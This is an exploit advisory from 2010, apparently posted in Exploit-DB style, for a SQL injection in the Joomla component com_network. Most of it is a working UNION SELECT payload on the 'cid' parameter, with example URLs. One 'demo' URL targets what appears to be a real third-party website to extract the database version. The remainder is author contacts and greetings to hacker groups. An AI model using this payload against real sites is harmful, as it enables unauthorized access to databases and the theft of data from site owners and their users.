# Title : Joomla Component com_network SQL Injection Vulnerability # Author: DevilZ TM # Data : 2010-04-01 [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_network SQL Injection Vulnerability [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Email : Expl0it@DevilZTM.Com [~] Contact : D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_network&act=customer&task=details&cid=[SQL] [~] ExploiT : -1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- [~] Example : http://127.0.0.1/index.php?option=com_network&act=customer&task=details&cid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- [~] Demo : http://linuxbak.tim-online.nl/sharenetworking_v2/index.php?option=com_network&act=customer&task=details&cid=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS [~] IRANIAN Young HackerZ [~] GreetZ : Exploit-DB TeaM [~]######################################### FinisH :D #############################################[~]